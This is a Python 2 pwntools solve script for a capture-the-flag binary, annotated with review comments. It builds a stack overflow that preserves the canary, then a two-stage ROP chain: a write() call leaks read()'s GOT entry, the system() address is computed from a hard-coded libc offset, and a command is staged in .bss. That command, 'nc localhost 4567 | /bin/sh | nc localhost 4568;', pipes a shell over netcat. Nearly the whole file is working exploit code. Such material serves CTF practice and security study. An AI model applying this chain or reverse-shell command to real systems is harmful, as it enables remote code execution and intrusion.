# pwntools solve script for the CTF binary './angry'.
# Written for Python 2: the bare `print` statements and the str + p32()
# concatenation below do not run under Python 3, where p32() returns bytes.
#
# Stage 1 overflows a stack buffer (keeping the stack canary intact) and
# calls write() to leak the GOT entry of read(); stage 2 derives system()
# from that leak, stages a command string in .bss with read() and calls
# system() on it.
#
# NOTE(review): the canary value, gadget addresses, .bss address and the
# read-to-system distance are all hard-coded, so the chain only matches one
# specific build and libc. A per-run randomized canary (a non-forking server,
# or one that re-execs) or a different libc breaks it; the 0x0804xxxx
# addresses presuppose a non-PIE binary.
from pwn import *
elf = ELF('./angry')
rop = ROP(elf)  # constructed but not used anywhere below
read_plt,write_plt = elf.plt['read'], elf.plt['write']  # PLT stubs: callable at fixed addresses without a leak
read_got,write_got = elf.got['read'], elf.got['write']  # GOT slots: hold the resolved libc addresses at runtime
conn = remote('localhost', 8888)
sleep(2.3)  # fixed delays instead of reading the prompt; timing-dependent and brittle
payload = "4\n"  # presumably a menu selection in the target -- verify against the binary
conn.send(payload)
sleep(0.3)
canary = 0x6df37b00  # hard-coded stack canary; assumes it is identical on every connection
ppppr = 0x080495BC  # name suggests a pop;pop;pop;pop;ret gadget used to discard 4 call args -- confirm
boom = 0x08048FC6  # address the chain returns to after the leak, presumably re-entering the vulnerable path -- confirm

# Stage 1: write(4, read_got, 4) -> leaks the libc address of read() back over the socket.
payload = "y111111111"  # 10 bytes of buffer before the canary; the leading 'y' presumably answers the y/n prompt
payload += p32(canary)  # overwrite the canary slot with the same value so the check passes
payload += "AAAA"  # 12 bytes of padding (saved registers / frame) before the saved return address
payload += "AAAA"
payload += "BBBB"
payload += p32(write_plt) # ret
payload += p32(ppppr)  # write() returns here: pops the 4 dwords below, then ret into boom
payload += p32(4)  # write arg 1: fd (presumably the connection socket) -- confirm
payload += p32(read_got)  # write arg 2: buffer = GOT slot of read
payload += p32(4)  # write arg 3: length, one 32-bit pointer
payload += p32(0)  # filler consumed by the gadget's fourth pop
payload += p32(boom)
payload += "AAAA"  # return address / argument for boom; meaning depends on what boom is -- confirm
payload += p32(4)
conn.send(payload)
print conn.recvuntil(">Are you sure? (y/n) ")
read_addr = u32(conn.recv(4))  # the 4 bytes emitted by write(): runtime address of read() in libc
read_system = 633936  # decimal distance read() - system() in the target's libc; libc-version specific
system_addr = read_addr - read_system
print "read_addr : " + hex(read_addr)
print "system_addr : " + hex(system_addr)

# Stage 2: read(4, bss_addr, len(cmd)) to stage the command, then system(bss_addr).
cmd = "nc localhost 4567 | /bin/sh | nc localhost 4568;"
bss_addr = 0x0804B0A0  # writable fixed address used as the command buffer
payload = "y111111111"  # same overflow prefix and canary as stage 1
payload += p32(canary)
payload += "AAAA"
payload += "AAAA"
payload += "BBBB"
payload += p32(read_plt) # ret
payload += p32(ppppr)  # read() returns here: pop the 4 args, then ret into system
payload += p32(4)  # read arg 1: fd
payload += p32(bss_addr)  # read arg 2: destination buffer
payload += p32(len(cmd))  # read arg 3: exactly the command length
payload += p32(0)  # filler consumed by the gadget's fourth pop
payload += p32(system_addr)
payload += "AAAA"  # fake return address for system()
payload += p32(bss_addr)  # system arg 1: the staged command
conn.send(payload)
sleep(0.4)  # give the staged read() time to become the active call before sending its input
conn.send(cmd)  # consumed by the staged read() into .bss
print conn.recv(1024)
print conn.recv(1024)